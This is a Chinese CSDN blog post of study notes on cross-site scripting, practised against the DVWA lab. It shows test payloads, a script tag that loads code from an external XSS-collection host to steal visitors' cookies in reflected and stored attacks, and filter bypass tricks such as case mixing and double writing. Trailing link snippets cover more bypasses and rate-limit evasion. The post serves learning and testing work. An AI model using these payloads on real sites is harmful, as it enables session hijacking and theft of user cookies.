xss绕过空格符号_第二轮学习笔记: XSS跨站脚本漏洞

最新推荐文章于 2024-06-05 21:25:22 发布
最新推荐文章于 2024-06-05 21:25:22 发布
阅读量450 收藏
点赞数
文章标签: xss绕过空格符号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29670781/article/details/112400839
版权

扎头发,两圈太松,三圈太紧,洗澡,往左一点烫死,往右一点冻死,吃泡面,一桶吃不饱,两桶吃不完,就像我们的关系。。。

---- 网易云热评

跨站脚本攻击(XSS),恶意攻击者在web页面插入恶意script代码,当用户浏览该页面时,恶意代码就会被执行,达到攻击用户的目的。

形成原因:程序对输入和输出的过滤不严格

一、反射型XSS:需要欺骗用户自己点击链接才能出发XSS代码

1、在输入窗口输入123,点击提交,审查元素,可以看到提交的内容显示在了网页

c4abe743b056a648c5523b2a67e2bff6.png

2、在输入框输入:<script>alert('123')</script>,点击提交,弹出对话框,说明存在漏洞

6f59b3ae5441a3bfdbce7df03bc560e1.png

二、漏洞利用

1、找一个xss平台,注册账号,新建一个项目

3c93ee33a2b4baea63302259e4b84e33.png

613e1b6a4225b1f9ea3a47b043895f73.png

2、复制关键代码:<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,将该代码复制到存在漏洞的页面,然后提交

2896b6f30fcd5a44a2be59ca3c59ff9c.png

3、打开xss平台上创建的项目,我们可以得到DVWA平台登录的cookie

607ecac9a8ecda2038c7a44d5fef4ff2.png

三、存储型XSS:用户只要访问存在该漏洞的页面就会触发

1、在对话框输入<script>alert('123')</script>,提交,每次刷新页面都会弹出,说明该处存在xss漏洞

6fc18838cc5550e0902f2ea864de51bc.png

2、在对话框输入xss平台上生成的代码<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,点击提交,只要访问该页面的用户,都会在xss平台上看到他的cookie信息

eef87e8ed38930e37923931364238905.png

四、xss绕过

1、大小写绕过,将<script>修改为<ScRipt>

2、双写绕过,将<script>修改为<Sc<script>Ript>

3、注释绕过,将<script>修改为<scri<!--aaa--->pt>

4、实体转换,将&改为&amp,将<改为&lt,将>改为&gt等等

禁止非法,后果自负

欢迎关注公众号:web安全工具库

CHAO JIANG
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss绕过空格符号_某教程学习笔记(一):16、XSS漏洞
weixin_39757743的博客
12-22 669
真希望有一天,能将日记本里酝酿了一整夏的情话,写成情书寄予你,将那些曾经的词不达意、言不由衷、拐弯抹角的小情意,都坦坦荡荡讲给你听啊。。。---- 网易与热评一、Xss漏洞原因由于代码过滤不严格,导致js代码被执行的输出问题二、xss漏洞危害网络钓鱼,盗取各类账号窃取用户cookie窃取用户浏览请求弹广告,刷流量网页挂马提升用户权限传播跨站脚本蠕虫等二、反射性 XSS1、输入正常的内容,会显示he...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结: 1.xss跨站脚本攻击的定义 ...
xss绕过方式
weixin_55821558的博客
03-18 8926
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.xss的类型以及常用标签 二.xss常用绕过 总结 前言 xss(cross-site-scripting)中文:跨站脚本攻击 常年位于owasp top ten,可见他的地位。 基于javascript完成恶意攻击,javascript使用灵活 他可控制网页的行为 操作html、css、和浏览器,所以他的危害性特别大,了解并学习xss原理对于防范xss攻击意义重大。 提示:以下...
【攻击绕过】IP速率限制绕过
最新发布
大河之犬的博客
06-05 466
应尝试对目标功能的API接口执行暴力攻击,例如/api/v3/sign-up,包括/Sing-up,/SignUp,/singup,/api/v1/sign-up,/api/sign-up等替代选项。通过改变参数值或向请求添加非重要参数,可以规避网关的速率限制逻辑,使每个请求看起来是独一无二的。建议修改其他请求标头,如用户代理和Cookie,因为这些也可以用于识别和跟踪请求模式。部署代理网络以将请求分布到多个 IP 地址可以有效地绕过基于 IP 的速率限制。实例,可以调整以模拟来自不同IP的请求。
xss绕过
weixin_51692662的博客
08-19 2602
xss绕过
XSS绕过方法总结
xinyue9966的博客
11-02 1571
xss绕过方法 大小写绕过 双写绕过 alert(1) 替换绕过 过滤 alert 用prompt,confirm,top’alert’代替绕过 过滤() 用``代替绕过 过滤空格 用%0a(换行符),%0d(回车符),/**/代替绕过 小写转大写情况下 字符ſ大写后为S(ſ不等于s) %00截断绕过 xss 编码绕过 实体编码 javascript:alert(1) 十六进制 javascript:alert(1) 十进制 unicode编码 javascripu0074:alert(1) url编码
绕过过滤的空白字符
giun的博客
04-01 2575
<?php $info = ""; $req = []; $flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; ini_set("display_error", false); //为一个配置选项设置值 error_reporting(0); //关闭所有PHP错误报告 if(!isset($_GET['number'])){ head...
第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
XSS_Cheat_Sheet_2020_Edition:xss裂缝模糊测试payload的最佳集合2020版
03-19
Edition简介白帽赏金平台xss突破模糊测试有效替代的最佳集合2020版该备忘清单可用于攻击猎人,安全分析,渗透测试人员,根据应用的实际情况,测试不同的有效载荷,并观察响应内容,查找网络应用的跨站脚本突破,...
XSS_Rays.zip_XSS Rays 下载_tool_xss扫描_xss扫描器_漏洞扫描
09-22
最近The Spanner发布了一个名为XSS Rays的 XSS漏洞扫描器。这tool有点意思,是使用JS写的,JS遍历目标的link、form,然后构造测试用例去测试,可以发现DOM的XSS(当然是在测试用例打对了的情况下)。它的调用方式也...
xss-payload-list::bullseye:跨站脚本XSS漏洞有效负载列表
05-22
:rocket: 跨站脚本XSS漏洞有效负载列表 :rocket: 概述 : 跨站脚本XSS)攻击是一种注入,其中恶意脚本被注入到原本良性和可信任的网站中。 当攻击者使用Web应用程序将恶意代码(通常以浏览器脚本的形式)...
anti-xss:AntiAntiXSS | 通过PHP防止跨站脚本XSS
05-02
跨站脚本漏洞可能被攻击者用来绕过相同原产地策略之类的访问控制。截至2007年,在网站上进行的跨站脚本编写约占Symantec记录的所有安全漏洞的84%。” 演示: 笔记: 使用 -不要直接使用GLOBAL-Array(例如$ _...
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
第09篇:跨站脚本XSS)备忘单-2019版1
08-03
跨站脚本XSS)是一种常见的网络安全漏洞,它允许攻击者通过注入恶意脚本到受害者的浏览器中,从而执行非授权的操作。这份2019年的XSS备忘单详细列出了多种攻击向量,涵盖了不同的事件处理、通信协议、特殊属性、...
PHP、Apache环境中部署xsslabs(XSS跨站脚本攻击靶场)
01-08
* XSS跨站脚本攻击:XSS是指攻击者在网站上注入恶意脚本, 当用户访问该网站时,恶意脚本就会被执行,从而达到攻击者的目的。 * xsslabs:xsslabs是一款开源的XSS 漏洞靶场工具,由PHP代码编写而成,提供了多种XSS...
XSS跨站脚本攻击
01-27
跨站脚本攻击(XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充分的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 5392
尽管许多网站实施了输入过滤措施来防止跨站脚本XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式
qq_51577576的博客
12-06 3734
本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式 写的比较细,比较深,需要一定的基础才能看懂,仔细读完 不懂的可以百度查一查或者私信我,相信会有很大收获 目录 一、Xss绕过方式: 1. 前端过滤 2.双写绕过 3. 事件绕过 4. 大小写绕过 5. 注释干扰绕过 6.伪协议绕过 7.空格回车Tab绕过 8. 编码绕过 1. base64编码: 2. JS编码: 3. 十六进制: 4. unicode: 5. HTML实体编码: 6. URL...
XSS攻击详解:跨站脚本危害与类型分析
"xss跨站脚本攻击-运维安全详细笔记" XSS(Cross-site scripting)跨站脚本攻击是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证和过滤用户输入的情况。攻击者通过在网页上注入恶意脚本,使得其他用户在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值